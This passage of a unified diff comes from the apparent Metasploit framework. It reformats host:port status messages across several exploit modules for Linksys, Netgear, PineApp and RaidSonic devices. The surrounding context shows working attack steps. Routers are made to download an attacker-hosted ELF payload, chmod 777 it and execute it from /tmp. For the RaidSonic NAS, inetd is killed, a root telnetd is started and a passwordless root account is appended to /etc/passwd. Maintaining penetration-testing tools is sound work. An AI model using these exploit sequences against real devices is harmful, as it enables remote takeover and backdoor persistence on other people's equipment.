+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
       end
       return
     end
@@ -156,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
       service_url = 'http://' + srvhost_addr + ':' + srvport.to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|
@@ -172,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # download payload
     #
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to download #{service_url}")
     # this filename is used to store the payload on the device
     filename = rand_text_alpha_lower(8)
 
@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
       wait_linux_payload
@@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # chmod
     #
     cmd = "chmod 777 /tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to chmod #{downfile}")
     res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -206,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # execute
     #
     cmd = "/tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to execute #{downfile}")
     res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -217,17 +217,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, _request)
     # print_status("on_request_uri called: #{request.inspect}")
     if (!@pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...")
 
     waited = 0
     until (@elf_sent)

--- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Sends an HTTP request with authorization header to the router
   # Raises an exception unless the login is successful
   def test_login
-    print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user}:#{pass}")
 
     res = send_auth_request_cgi({
       'uri' => '/',
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if not res or res.code == 401 or res.code == 404
       fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
     else
-      print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}:#{pass}")
     end
   end
 

--- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return res
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
     return nil
   end
 
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # testing Login
     #
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
     begin
       res = send_request_cgi({
         'uri' => uri,
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
       if [200, 301, 302].include?(res.code)
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (!res)
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
       else
-        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
       end
       return
     end
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # start our server
     #
-    print_status("#{rhost}:#{rport} - Starting up our TFTP service")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our TFTP service")
     @tftp = Rex::Proto::TFTP::Server.new
     @tftp.register_file(downfile, @pl, true)
     @tftp.start
@@ -157,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # download payload
     #
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to download #{downfile}")
     # this filename is used to store the payload on the device -> we have limited space for the filename!
     filename = rand_text_alpha_lower(4)
 
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['DELAY']} seconds to the Linksys device to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['DELAY']} seconds to the Linksys device to download the payload")
       select(nil, nil, nil, datastore['DELAY'])
     else
       wait_linux_payload
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # chmod
     #
     cmd = "chmod 777 /tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to chmod #{downfile}")
     res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -192,7 +192,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # execute
     #
     cmd = "/tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to execute #{downfile}")
     res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -201,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...")
 
     waited = 0
     until (@tftp.files.length == 0)

--- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def grab_config(user, pass)
-    print_status("#{rhost}:#{rport} - Trying to download the original configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to download the original configuration")
     begin
       res = send_request_cgi({
         'uri' => '/index.asp',
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
       if [200, 301, 302].include?(res.code)
         if res.body =~ /lan_ipaddr_0/
-          print_good("#{rhost}:#{rport} - Successful downloaded the configuration")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful downloaded the configuration")
         else
           fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible")
         end
@@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # we have used most parts of the original configuration
     # just need to restore wan_hostname
     cmd = @wan_hostname_orig.to_s
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to reload original configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to reload original configuration")
 
     res = request(cmd, user, pass, uri)
 
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # the device needs around 10 seconds to apply our current configuration
-    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{@timeout} seconds for reloading the configuration")
     select(nil, nil, nil, @timeout)
   end
 
@@ -255,7 +255,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # testing Login
     #
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
     begin
       res = send_request_cgi({
         'uri' => uri,
@@ -266,7 +266,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
       if [200, 301, 302].include?(res.code)
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
@@ -286,9 +286,9 @@ class MetasploitModule < Msf::Exploit::Remote
       if (!res)
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
       else
-        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
       end
-      print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{@timeout} seconds for reloading the configuration")
       select(nil, nil, nil, @timeout)
       restore_conf(user, pass, uri) if restore
       return
@@ -307,7 +307,7 @@ class MetasploitModule < Msf::Exploit::Remote
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
       service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|
@@ -323,7 +323,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # download payload
     #
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to download #{service_url}")
     # this filename is used to store the payload on the device
     filename = rand_text_alpha_lower(8)
 
@@ -338,7 +338,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # wait for payload download
     if (datastore['DOWNHOST'])
       # waiting some time so we could be sure that the device got the payload from our third party server
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
       wait_linux_payload
@@ -350,12 +350,12 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     cmd = "chmod 777 /tmp/#{filename}"
     cmd = "`#{cmd}`"
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to chmod #{downfile}")
     res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
-    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{@timeout} seconds for reloading the configuration")
     select(nil, nil, nil, @timeout)
 
     #
@@ -363,12 +363,12 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     cmd = "/tmp/#{filename}"
     cmd = "`#{cmd}`"
-    print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to execute #{downfile}")
     res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
-    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{@timeout} seconds for reloading the configuration")
     select(nil, nil, nil, @timeout)
 
     #
@@ -383,17 +383,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, _request)
     # print_status("on_request_uri called: #{request.inspect}")
     if (!@pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...")
 
     waited = 0
     until (@elf_sent)

--- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return res
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
     return nil
   end
 
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # testing Login
     #
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
     begin
       res = send_request_cgi({
         'uri' => uri,
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
       if [200, 301, 302].include?(res.code)
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (!res)
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
       else
-        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
       end
       return
     end
@@ -161,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
       service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # download payload
     #
-    print_status("#{rhost}:#{rport} - Asking the Netgear device to download #{service_url}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Netgear device to download #{service_url}")
     # this filename is used to store the payload on the device
     filename = rand_text_alpha_lower(8)
 
@@ -190,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
       wait_linux_payload
@@ -201,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # chmod
     #
     cmd = "chmod 777 /tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the Netgear device to chmod #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Netgear device to chmod #{downfile}")
     res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -211,7 +211,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # execute
     #
     cmd = "/tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the Netgear device to execute #{downfile}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Netgear device to execute #{downfile}")
     res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -222,17 +222,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, _request)
     # print_status("on_request_uri called: #{request.inspect}")
     if (!@pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...")
 
     waited = 0
     until (@elf_sent)

--- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def grab_config(user, pass)
-    print_status("#{rhost}:#{rport} - Trying to download the original configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to download the original configuration")
     begin
       res = send_request_cgi({
         'uri' => '/BAS_pppoe.htm',
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
       if [200, 301, 302].include?(res.code)
         if res.body =~ /pppoe_username/
-          print_good("#{rhost}:#{rport} - Successfully downloaded the configuration")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successfully downloaded the configuration")
         else
           fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported")
         end
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # we have used most parts of the original configuration
     # just need to restore pppoe_username
     cmd = @pppoe_username_orig
-    print_status("#{rhost}:#{rport} - Asking the Netgear device to reload original configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Netgear device to reload original configuration")
 
     res = request(cmd, user, pass, uri)
 
@@ -146,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to reload original configuration")
     end
 
-    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting #{@timeout} seconds for reloading the configuration")
     select(nil, nil, nil, @timeout)
   end
 
@@ -198,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return res
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
     return nil
   end
 
@@ -225,7 +225,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # testing Login
     #
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
     begin
       res = send_request_cgi({
         'uri' => '/',
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
       if [200, 301, 302].include?(res.code)
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
       end
@@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (!res)
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
       else
-        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
       end
       return
     end
@@ -274,7 +274,7 @@ class MetasploitModule < Msf::Exploit::Remote
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
       service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|
@@ -290,7 +290,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # download payload
     #
-    print_status("#{rhost}:#{rport} - Asking the Netgear device to download and execute #{service_url}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Netgear device to download and execute #{service_url}")
     # this filename is used to store the payload on the device
     filename = rand_text_alpha_lower(8)
 
@@ -304,7 +304,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
       wait_linux_payload
@@ -326,17 +326,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, _request)
     # print_status("on_request_uri called: #{request.inspect}")
     if (!@pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...")
 
     waited = 0
     until (@elf_sent)

--- a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb
+++ b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Executing payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing payload...")
     send_request_cgi({
       'uri' => my_uri,
       'vars_get' => {

--- a/modules/exploits/linux/http/pineapp_livelog_exec.rb
+++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Executing payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing payload...")
     send_request_cgi({
       'uri' => my_uri,
       'vars_get' => {

--- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb
+++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb
@@ -97,13 +97,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Retrieving session cookie...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Retrieving session cookie...")
     cookies = get_cookies
     if cookies.nil?
       fail_with(Failure::Unknown, "Failed to retrieve the session cookie")
     end
 
-    print_status("#{rhost}:#{rport} - Executing payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing payload...")
     send_request_cgi({
       'uri' => my_uri,
       'cookie' => cookies,

--- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
+++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
@@ -76,12 +76,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     telnet_port = rand(32767) + 32768
 
-    print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Telnet port: #{telnet_port}")
 
     # first request
     cmd = "killall inetd"
     cmd = Rex::Text.uri_encode(cmd)
-    print_status("#{rhost}:#{rport} - sending first request - killing inetd")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - sending first request - killing inetd")
 
     res = request(cmd)
     # no server header or something that we could use to get sure the command is executed
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     inetd_cfg = rand_text_alpha(8)
     cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
     cmd = Rex::Text.uri_encode(cmd)
-    print_status("#{rhost}:#{rport} - sending second request - configure inetd")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - sending second request - configure inetd")
 
     res = request(cmd)
     # no server header or something that we could use to get sure the command is executed
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # third request
     cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
     cmd = Rex::Text.uri_encode(cmd)
-    print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - sending third request - starting inetd and telnetd")
 
     res = request(cmd)
     # no server header or something that we could use to get sure the command is executed
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @user = rand_text_alpha(6)
     cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd"
     cmd = Rex::Text.uri_encode(cmd)
-    print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - sending fourth request - configure user #{@user}")
 
     res = request(cmd)
     # no server header or something that we could use to get sure the command is executed
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
     end
 
-    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to establish a telnet connection...")
     ctx = { 'Msf' => framework, 'MsfExploit' => self }
     sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx })
 
@@ -135,13 +135,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     add_socket(sock)
 
-    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to establish a telnet session...")
     prompt = negotiate_telnet(sock)
     if prompt.nil?
       sock.close
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
     else
-      print_good("#{rhost}:#{rport} - Telnet session successfully established...")
